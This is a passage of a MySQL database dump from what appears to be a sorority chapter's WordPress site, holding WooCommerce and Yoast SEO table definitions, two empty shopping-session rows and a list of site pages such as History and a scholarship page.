DROP TABLE IF EXISTS `lwz_woocommerce_attribute_taxonomies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_attribute_taxonomies` (
  `attribute_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `attribute_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `attribute_label` varchar(200) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `attribute_type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `attribute_orderby` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `attribute_public` int(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`attribute_id`),
  KEY `attribute_name` (`attribute_name`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_attribute_taxonomies`
--

LOCK TABLES `lwz_woocommerce_attribute_taxonomies` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_attribute_taxonomies` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_attribute_taxonomies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_downloadable_product_permissions`
--

DROP TABLE IF EXISTS `lwz_woocommerce_downloadable_product_permissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_downloadable_product_permissions` (
  `permission_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `download_id` varchar(36) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `order_key` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_email` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `downloads_remaining` varchar(9) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `access_granted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access_expires` datetime DEFAULT NULL,
  `download_count` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`permission_id`),
  KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`(191),`download_id`),
  KEY `download_order_product` (`download_id`,`order_id`,`product_id`),
  KEY `order_id` (`order_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_downloadable_product_permissions`
--

LOCK TABLES `lwz_woocommerce_downloadable_product_permissions` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_downloadable_product_permissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_downloadable_product_permissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_log`
--

DROP TABLE IF EXISTS `lwz_woocommerce_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_log` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `level` smallint(4) NOT NULL,
  `source` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `message` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `context` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`log_id`),
  KEY `level` (`level`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_log`
--

LOCK TABLES `lwz_woocommerce_log` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_order_itemmeta`
--

DROP TABLE IF EXISTS `lwz_woocommerce_order_itemmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_order_itemmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `order_item_id` (`order_item_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_order_itemmeta`
--

LOCK TABLES `lwz_woocommerce_order_itemmeta` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_order_itemmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_order_itemmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_order_items`
--

DROP TABLE IF EXISTS `lwz_woocommerce_order_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_order_items` (
  `order_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_name` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `order_item_type` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `order_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_order_items`
--

LOCK TABLES `lwz_woocommerce_order_items` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_order_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_order_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_payment_tokenmeta`
--

DROP TABLE IF EXISTS `lwz_woocommerce_payment_tokenmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_payment_tokenmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `payment_token_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `payment_token_id` (`payment_token_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_payment_tokenmeta`
--

LOCK TABLES `lwz_woocommerce_payment_tokenmeta` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_payment_tokenmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_payment_tokenmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_payment_tokens`
--

DROP TABLE IF EXISTS `lwz_woocommerce_payment_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_payment_tokens` (
  `token_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `gateway_id` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `token` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `type` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `is_default` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`token_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_payment_tokens`
--

LOCK TABLES `lwz_woocommerce_payment_tokens` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_payment_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_payment_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_sessions`
--

DROP TABLE IF EXISTS `lwz_woocommerce_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `session_value` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_key`),
  UNIQUE KEY `session_id` (`session_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_sessions`
--

LOCK TABLES `lwz_woocommerce_sessions` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_sessions` DISABLE KEYS */;
INSERT INTO `lwz_woocommerce_sessions` VALUES (1,'5068644b6c907a0a510e6552937ba205','a:7:{s:4:\"cart\";s:6:\"a:0:{}\";s:11:\"cart_totals\";s:367:\"a:15:{s:8:\"subtotal\";i:0;s:12:\"subtotal_tax\";i:0;s:14:\"shipping_total\";i:0;s:12:\"shipping_tax\";i:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";i:0;s:12:\"discount_tax\";i:0;s:19:\"cart_contents_total\";i:0;s:17:\"cart_contents_tax\";i:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";i:0;s:7:\"fee_tax\";i:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";i:0;s:9:\"total_tax\";i:0;}\";s:15:\"applied_coupons\";s:6:\"a:0:{}\";s:22:\"coupon_discount_totals\";s:6:\"a:0:{}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:8:\"customer\";s:687:\"a:26:{s:2:\"id\";s:1:\"0\";s:13:\"date_modified\";s:0:\"\";s:8:\"postcode\";s:0:\"\";s:4:\"city\";s:0:\"\";s:9:\"address_1\";s:0:\"\";s:7:\"address\";s:0:\"\";s:9:\"address_2\";s:0:\"\";s:5:\"state\";s:0:\"\";s:7:\"country\";s:2:\"US\";s:17:\"shipping_postcode\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:14:\"shipping_state\";s:0:\"\";s:16:\"shipping_country\";s:2:\"US\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:7:\"company\";s:0:\"\";s:5:\"phone\";s:0:\"\";s:5:\"email\";s:0:\"\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";}\";}',1534255693),(2,'1','a:7:{s:4:\"cart\";s:6:\"a:0:{}\";s:11:\"cart_totals\";s:367:\"a:15:{s:8:\"subtotal\";i:0;s:12:\"subtotal_tax\";i:0;s:14:\"shipping_total\";i:0;s:12:\"shipping_tax\";i:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";i:0;s:12:\"discount_tax\";i:0;s:19:\"cart_contents_total\";i:0;s:17:\"cart_contents_tax\";i:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";i:0;s:7:\"fee_tax\";i:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";i:0;s:9:\"total_tax\";i:0;}\";s:15:\"applied_coupons\";s:6:\"a:0:{}\";s:22:\"coupon_discount_totals\";s:6:\"a:0:{}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:8:\"customer\";s:703:\"a:26:{s:2:\"id\";s:1:\"1\";s:13:\"date_modified\";s:0:\"\";s:8:\"postcode\";s:0:\"\";s:4:\"city\";s:0:\"\";s:9:\"address_1\";s:0:\"\";s:7:\"address\";s:0:\"\";s:9:\"address_2\";s:0:\"\";s:5:\"state\";s:0:\"\";s:7:\"country\";s:2:\"US\";s:17:\"shipping_postcode\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:14:\"shipping_state\";s:0:\"\";s:16:\"shipping_country\";s:2:\"US\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:7:\"company\";s:0:\"\";s:5:\"phone\";s:0:\"\";s:5:\"email\";s:15:\"pr@zphiblgz.org\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";}\";}',1534255711);
/*!40000 ALTER TABLE `lwz_woocommerce_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_shipping_zone_locations`
--

DROP TABLE IF EXISTS `lwz_woocommerce_shipping_zone_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_shipping_zone_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_id` bigint(20) unsigned NOT NULL,
  `location_code` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `location_id` (`location_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_shipping_zone_locations`
--

LOCK TABLES `lwz_woocommerce_shipping_zone_locations` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_shipping_zone_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_shipping_zone_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_shipping_zone_methods`
--

DROP TABLE IF EXISTS `lwz_woocommerce_shipping_zone_methods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_shipping_zone_methods` (
  `zone_id` bigint(20) unsigned NOT NULL,
  `instance_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `method_id` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `method_order` bigint(20) unsigned NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`instance_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_shipping_zone_methods`
--

LOCK TABLES `lwz_woocommerce_shipping_zone_methods` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_shipping_zone_methods` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_shipping_zone_methods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_shipping_zones`
--

DROP TABLE IF EXISTS `lwz_woocommerce_shipping_zones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_shipping_zones` (
  `zone_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `zone_order` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`zone_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_shipping_zones`
--

LOCK TABLES `lwz_woocommerce_shipping_zones` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_shipping_zones` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_shipping_zones` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_tax_rate_locations`
--

DROP TABLE IF EXISTS `lwz_woocommerce_tax_rate_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_tax_rate_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `location_code` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_tax_rate_locations`
--

LOCK TABLES `lwz_woocommerce_tax_rate_locations` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_tax_rate_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_tax_rate_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_tax_rates`
--

DROP TABLE IF EXISTS `lwz_woocommerce_tax_rates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_tax_rates` (
  `tax_rate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `tax_rate_country` varchar(2) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate_state` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate` varchar(8) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate_priority` bigint(20) unsigned NOT NULL,
  `tax_rate_compound` int(1) NOT NULL DEFAULT '0',
  `tax_rate_shipping` int(1) NOT NULL DEFAULT '1',
  `tax_rate_order` bigint(20) unsigned NOT NULL,
  `tax_rate_class` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_id`),
  KEY `tax_rate_country` (`tax_rate_country`),
  KEY `tax_rate_state` (`tax_rate_state`(191)),
  KEY `tax_rate_class` (`tax_rate_class`(191)),
  KEY `tax_rate_priority` (`tax_rate_priority`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_tax_rates`
--

LOCK TABLES `lwz_woocommerce_tax_rates` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_tax_rates` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_tax_rates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_yoast_indexable`
--

DROP TABLE IF EXISTS `lwz_yoast_indexable`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_yoast_indexable` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `permalink` longtext COLLATE utf8mb4_unicode_520_ci,
  `permalink_hash` varchar(40) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `object_id` bigint(20) DEFAULT NULL,
  `object_type` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `object_sub_type` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `author_id` bigint(20) DEFAULT NULL,
  `post_parent` bigint(20) DEFAULT NULL,
  `title` text COLLATE utf8mb4_unicode_520_ci,
  `description` mediumtext COLLATE utf8mb4_unicode_520_ci,
  `breadcrumb_title` text COLLATE utf8mb4_unicode_520_ci,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `is_public` tinyint(1) DEFAULT NULL,
  `is_protected` tinyint(1) DEFAULT '0',
  `has_public_posts` tinyint(1) DEFAULT NULL,
  `number_of_pages` int(11) unsigned DEFAULT NULL,
  `canonical` longtext COLLATE utf8mb4_unicode_520_ci,
  `primary_focus_keyword` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `primary_focus_keyword_score` int(3) DEFAULT NULL,
  `readability_score` int(3) DEFAULT NULL,
  `is_cornerstone` tinyint(1) DEFAULT '0',
  `is_robots_noindex` tinyint(1) DEFAULT '0',
  `is_robots_nofollow` tinyint(1) DEFAULT '0',
  `is_robots_noarchive` tinyint(1) DEFAULT '0',
  `is_robots_noimageindex` tinyint(1) DEFAULT '0',
  `is_robots_nosnippet` tinyint(1) DEFAULT '0',
  `twitter_title` text COLLATE utf8mb4_unicode_520_ci,
  `twitter_image` longtext COLLATE utf8mb4_unicode_520_ci,
  `twitter_description` longtext COLLATE utf8mb4_unicode_520_ci,
  `twitter_image_id` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `twitter_image_source` text COLLATE utf8mb4_unicode_520_ci,
  `open_graph_title` text COLLATE utf8mb4_unicode_520_ci,
  `open_graph_description` longtext COLLATE utf8mb4_unicode_520_ci,
  `open_graph_image` longtext COLLATE utf8mb4_unicode_520_ci,
  `open_graph_image_id` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `open_graph_image_source` text COLLATE utf8mb4_unicode_520_ci,
  `open_graph_image_meta` mediumtext COLLATE utf8mb4_unicode_520_ci,
  `link_count` int(11) DEFAULT NULL,
  `incoming_link_count` int(11) DEFAULT NULL,
  `prominent_words_version` int(11) unsigned DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `blog_id` bigint(20) NOT NULL DEFAULT '1',
  `language` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `region` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `schema_page_type` varchar(64) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `schema_article_type` varchar(64) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `has_ancestors` tinyint(1) DEFAULT '0',
  `estimated_reading_time_minutes` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
  KEY `object_id_and_type` (`object_id`,`object_type`),
  KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
  KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
  KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`)
) ENGINE=InnoDB AUTO_INCREMENT=85 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_yoast_indexable`
--

LOCK TABLES `lwz_yoast_indexable` WRITE;
/*!40000 ALTER TABLE `lwz_yoast_indexable` DISABLE KEYS */;
INSERT INTO `lwz_yoast_indexable` VALUES (1,'https://zphiblgz.org/author/przphiblgz-org/','43:28d89b182c2a2de753aa1760d3996bc0',1,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/bf9f64120dea3e0f81bdbba035ee5d55?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/bf9f64120dea3e0f81bdbba035ee5d55?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-09-28 01:07:11','2021-09-23 00:32:03',1,NULL,NULL,NULL,NULL,0,NULL),(2,'https://zphiblgz.org/','21:809b484791d5380447624536ebc76981',6,'post','page',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:07:11','2021-09-22 20:30:22',1,NULL,NULL,NULL,NULL,0,NULL),(3,'https://zphiblgz.org/?page_id=1288','34:d4aff4c4137bb16c0cdd83d5a3e2360b',1288,'post','page',1,0,NULL,NULL,'Contact Us','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 21:25:55',1,NULL,NULL,NULL,NULL,0,NULL),(4,'https://zphiblgz.org/sorority-membership/','41:85f9ceb85a84935e23ac5dbcf457c287',1313,'post','page',1,0,NULL,NULL,'Sorority Membership','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 15:11:23',1,NULL,NULL,NULL,NULL,0,NULL),(5,'https://zphiblgz.org/history/','29:f43801b34d52dc1a3efd6da7ba3824c7',190,'post','page',1,0,NULL,NULL,'History','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 15:11:20',1,NULL,NULL,NULL,NULL,0,NULL),(6,'https://zphiblgz.org/zhope/','27:51815e7063af854d14f01885f5daf6f0',247,'post','page',1,0,NULL,NULL,'Z-HOPE','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 21:25:55',1,NULL,NULL,NULL,NULL,0,NULL),(7,'https://zphiblgz.org/zhope/appa/','32:c1099ab34c9261e7ce89b9061cd10ab6',781,'post','page',1,247,NULL,NULL,'A Pretty &#038; Polished Affair','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 21:25:55',1,NULL,NULL,NULL,NULL,1,NULL),(8,'https://zphiblgz.org/youth/','27:e2753b9af746da3f5cb6ac4b847dd910',738,'post','page',1,0,NULL,NULL,'Youth Auxiliaries','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 21:25:55',1,NULL,NULL,NULL,NULL,0,NULL),(9,'https://zphiblgz.org/zhope/breakfastonthego/','44:3ae000fad06d238a5b2a667a135e43be',772,'post','page',1,247,NULL,'Quick and healthy breakfast provided for students before taking the SAT exam.','Breakfast on the Go','publish',NULL,0,NULL,NULL,NULL,'Breakfast',30,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 21:25:55',1,NULL,NULL,NULL,NULL,1,NULL),(10,'https://zphiblgz.org/scholarship/','33:b62c2cb75cbe0a551e25c6a4223d624f',797,'post','page',1,0,NULL,NULL,'W. Ruth Conway Scholarship','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-09-28 01:11:59','2021-09-23 